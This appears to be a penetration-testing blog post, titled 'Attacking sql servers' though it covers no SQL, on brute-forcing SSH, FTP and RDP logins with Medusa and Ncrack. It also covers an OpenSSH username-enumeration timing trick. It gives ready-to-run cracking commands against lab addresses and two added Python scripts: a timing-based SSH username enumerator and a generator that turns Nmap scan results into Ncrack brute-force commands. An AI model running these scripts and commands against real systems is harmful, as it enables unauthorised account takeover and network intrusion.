Wednesday, 30 March 2016

Attacking sql servers

MEDUSA

Medusa is an alternative to Hydra: a parallel, network-based password brute-forcing tool. Both tools do the same job, but they parallelise differently. Medusa runs its login attempts in POSIX threads (“pthreads”) that share one process's memory, whereas Hydra forks child processes, each carrying its own copy of the process state. That design difference is the basis for the claim that Medusa is lighter and more stable; the project's own documentation (linked below) goes into the comparison in more detail.

BASIC SYNTAX

Running medusa without parameters prints its option list. At minimum we need four options:
-h = Host to attack (-H for a file of hosts)
-u = Username to attack (-U for a file of usernames)
-P = Password file (-p for a single password)
-M = Module, i.e. the service to attack (ssh, ftp, smbnt, ...)
Other options worth knowing: -n for a non-default port, -t for the number of parallel logins per host, -f to stop after the first valid credential on a host, and -e ns to additionally try an empty password and the username as the password.

OPENSSH USERNAME DISCOVERY BUG

In the following example we will use Medusa to crack an SSH password, but first we will use an OpenSSH username-discovery bug to find a valid username. OpenSSH is one of the most widely deployed pieces of software for encrypted remote access. A brute-force attack is far more efficient when the penetration tester already knows which usernames exist, and with SSH there is a small trick for finding that out, brought to attention by a security researcher at “cureblog.de”.
The problem with OpenSSH is that it looks the user up before it validates the password, and the expensive part of the check only runs when the user exists. Supplying a very long password therefore makes the server noticeably slow for an existing account, while the same request for a non-existent account returns quickly. Summing up: with a very long password, a high delay means the username exists and a low delay means it does not. Tyler Borland has written a Python script that automates this measurement.
The script is available at
https://code.google.com/p/multiproc-openssh-username-bruteforce/source/browse/ssh_user_enum.py
Note: the bug does not always work, and at the time of writing it is not known under exactly which conditions it does.

USAGE

Usage is straightforward. The following checks whether the username root exists on the target:
root@root:# ./ssh_user_enum.py -user root -Host <IP>
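As an added example (not the page's own code and not Tyler Borland's script), the following Python implements the same measurement: send an oversized password for a candidate username, time the server's reply, and compare it to the timing for a random name that almost certainly does not exist on the host. The paramiko library and the 25000-byte password length are assumptions; the page does not say what the script uses. The decision logic takes the median of several samples so that a single slow connection caused by network jitter does not produce a false positive.

```python
"""Timing-based SSH username check (added example; not the script the post links to)."""
import random
import statistics
import string
import time


def random_username(length=12):
    """A random lowercase name used as the 'does not exist' baseline."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def paramiko_probe(host, port=22, password_length=25000):
    """Build a probe(username) -> seconds function that talks to a real sshd.

    Assumes the paramiko library is installed (imported lazily so the decision
    logic below can be exercised without it). The password length is an
    assumption; the post only says 'a password with large length'.
    """
    import paramiko

    long_password = "A" * password_length

    def probe(username):
        transport = paramiko.Transport((host, port))
        try:
            transport.connect()  # key exchange only; no host-key verification
            start = time.monotonic()
            try:
                transport.auth_password(username, long_password)
            except paramiko.SSHException:
                pass  # authentication failure is the expected outcome
            return time.monotonic() - start
        finally:
            transport.close()

    return probe


def enumerate_users(probe, candidates, samples=5, ratio=2.0):
    """Return {username: True/False}: whether each candidate appears to exist.

    A username is reported as existing when its median response time is at
    least `ratio` times the median for a random, almost surely nonexistent,
    name measured against the same server. Medians tolerate one slow sample
    caused by network jitter; a single measurement does not.
    """
    baseline_user = random_username()
    baseline = statistics.median(probe(baseline_user) for _ in range(samples))
    results = {}
    for user in candidates:
        elapsed = statistics.median(probe(user) for _ in range(samples))
        results[user] = elapsed >= baseline * ratio
    return results


if __name__ == "__main__":
    import sys

    target_host = sys.argv[1]
    users = sys.argv[2:] or ["root"]
    for user, exists in enumerate_users(paramiko_probe(target_host), users).items():
        print(f"{user}: {'likely exists' if exists else 'probably not a user'}")
```

Run it as `python3 ssh_timing.py <IP> root admin www-data`. The baseline is re-measured against the same server in the same run, which matters more than the absolute numbers: a loaded host or a slow link shifts both timings together, and only the ratio between them carries the signal.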

CRACKING SSH WITH MEDUSA

In the previous password-cracking example we used Hydra against FTP. In this example we use Medusa against an SSH account, with the following command:
medusa -h 192.168.75.141 -u root -P password.txt -M ssh
After a few attempts Medusa finds the correct password, “rafay”. You can now log in to the SSH server with your favourite SSH client, such as PuTTY.
Note: Medusa only found the password because it was in the wordlist; it was put there for the demonstration. Against a real target the outcome depends entirely on the quality of the wordlist.
Documentation:

NCRACK

Ncrack is one of my favourite password-cracking tools. It is built on the Nmap libraries, comes preinstalled on BackTrack, and can be combined with Nmap to good effect. Its only disadvantage is that it supports relatively few services: FTP, SSH, Telnet, POP3, SMB, RDP and VNC.

BASIC SYNTAX

Running ncrack without parameters prints the options it needs:
-u = Username to attack (-U for a file of usernames)
-P = Password file
-p = Port or service of the target to attack (lowercase p), e.g. -p ssh,ftp:2121
-f = Quit cracking a service after the first valid credential is found
-iX = Read targets from an Nmap XML output file

CRACKING AN RDP WITH NCRACK

It's funny how often I see the question “How do I crack an RDP?” on hacking and security forums, because the process is quite simple. RDP stands for Remote Desktop Protocol, which is generally used for remote administration of Windows hosts and listens on TCP port 3389.
As I have already demonstrated how to crack FTP and SSH with Hydra and Medusa, we will now crack an RDP account with Ncrack. But first, an interesting case study.

CASE STUDY OF A MORTO WORM

In August 2011, F-Secure published an interesting story about a worm named “Morto” that was spreading across networks around the world. The worm took advantage of people using weak or default passwords for their RDP logins, such as administrator, password and 123456. When Morto found an RDP service, it tried its list of default passwords. Once it had logged in, it scanned the local network for other hosts with Terminal Services (ms-term-serv) listening on TCP port 3389 and used the same password list against them. In this way it spread very fast.
Now that you have seen how dangerous an RDP service with a default password can be for an organisation, let us try cracking one with Ncrack.
Command:
ncrack -v -u administrator -P /pentest/passwords/wordlists/darkc0de.lst rdp://192.168.75.140
Here -v turns on verbose output, -u gives the username, -P the password file, and the target is written as rdp:// followed by the IP address of the target. Once the credential has been cracked we can log in with rdesktop:
Command:
rdesktop -u administrator -p aedis 192.168.75.140

COMBINING NMAP AND NCRACK FOR OPTIMAL RESULTS

As mentioned before, Ncrack can be combined with Nmap for more effective results. We have already learnt, in the scanning post, to write Nmap results to an XML file with the -oX option; if you are not familiar with it, go back and review that post.
In this example we scan the local network 192.168.75.1/24 for live hosts with open ports, save the results as XML, and hand that file to Ncrack, which will attempt to crack every service that requires authentication.
Then, from Ncrack, we execute the following command to brute-force all the network services requiring authentication.
Note: this does not work for ms-term-serv (RDP) because of a bug in the tool, so RDP has to be attacked separately using the method explained earlier.
Command:
ncrack -vv -u administrator -P /pentest/passwords/wordlists/darkc0de.lst -iX /root/Desktop/output.xml -f
Ncrack now starts cracking only the services that require authentication and skips the rest. You have now seen how easy it is to combine Nmap and Ncrack to automate the process.
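To make the Nmap-to-Ncrack hand-off concrete, here is an added Python example (not part of Nmap or Ncrack, and not the page's own code) that reads an Nmap XML file, keeps only the open ports whose service Ncrack has a module for, and builds the Ncrack target list. It also applies the caveat from the note above: RDP targets are pulled out into their own command instead of being fed in with the rest. The XML below is constructed for the example and stands in for the output of an assumed scan such as `nmap -sV 192.168.75.1/24 -oX /root/Desktop/output.xml`; the service-name-to-module table is also an assumption, limited to the services the page lists for Ncrack.

```python
"""Build ncrack targets from nmap -oX output (added example; not nmap's or ncrack's code)."""
import shlex
import xml.etree.ElementTree as ET

# Nmap service names -> ncrack module names. Only the services the post lists
# for ncrack are mapped; anything else is skipped. RDP is mapped but routed to
# a separate command because of the -iX limitation the post describes.
SERVICE_TO_MODULE = {
    "ssh": "ssh",
    "ftp": "ftp",
    "telnet": "telnet",
    "pop3": "pop3",
    "microsoft-ds": "smb",
    "netbios-ssn": "smb",
    "ms-wbt-server": "rdp",
    "ms-term-serv": "rdp",
    "vnc": "vnc",
}

# Constructed sample in the shape of nmap -oX output (not a real scan).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="192.168.75.140" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
    </ports>
  </host>
  <host><status state="up"/>
    <address addr="192.168.75.141" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="2121"><state state="open"/><service name="ftp"/></port>
      <port protocol="tcp" portid="23"><state state="filtered"/><service name="telnet"/></port>
    </ports>
  </host>
  <host><status state="down"/>
    <address addr="192.168.75.142" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def ncrack_targets(nmap_xml):
    """Return (targets, rdp_targets) as ncrack specs like 'ssh://192.168.75.141:22'.

    Hosts that are not up, ports that are not open, and services without an
    ncrack module are skipped. Non-default ports (the ftp on 2121 above) are
    carried through explicitly so ncrack does not guess them.
    """
    root = ET.fromstring(nmap_xml)
    targets, rdp_targets = [], []
    for host in root.iter("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        address = host.find("address[@addrtype='ipv4']")
        if address is None:
            continue
        ip = address.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            service = port.find("service")
            name = service.get("name") if service is not None else ""
            module = SERVICE_TO_MODULE.get(name)
            if module is None:
                continue  # ncrack cannot attack this service
            spec = f"{module}://{ip}:{port.get('portid')}"
            (rdp_targets if module == "rdp" else targets).append(spec)
    return targets, rdp_targets


def ncrack_commands(nmap_xml, user, wordlist):
    """Return the argv lists to run: one bulk command, then one per RDP target."""
    targets, rdp_targets = ncrack_targets(nmap_xml)
    commands = []
    if targets:
        commands.append(["ncrack", "-vv", "-u", user, "-P", wordlist, "-f"] + targets)
    for spec in rdp_targets:  # RDP is tried separately, as the post's note advises
        commands.append(["ncrack", "-v", "-u", user, "-P", wordlist, spec])
    return commands


if __name__ == "__main__":
    for argv in ncrack_commands(SAMPLE_NMAP_XML, "administrator",
                                "/pentest/passwords/wordlists/darkc0de.lst"):
        print(shlex.join(argv))
```

Point the script at a real file with `ET.parse(path).getroot()` in place of `ET.fromstring(SAMPLE_NMAP_XML)` and pipe each printed line to a shell, or pass the argv lists straight to `subprocess.run`. Building the target list yourself rather than relying on `-iX` is also the simplest way to work around the RDP problem the post mentions: the bulk command never sees the RDP ports, and the per-host rdp:// commands are run exactly as in the earlier section.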
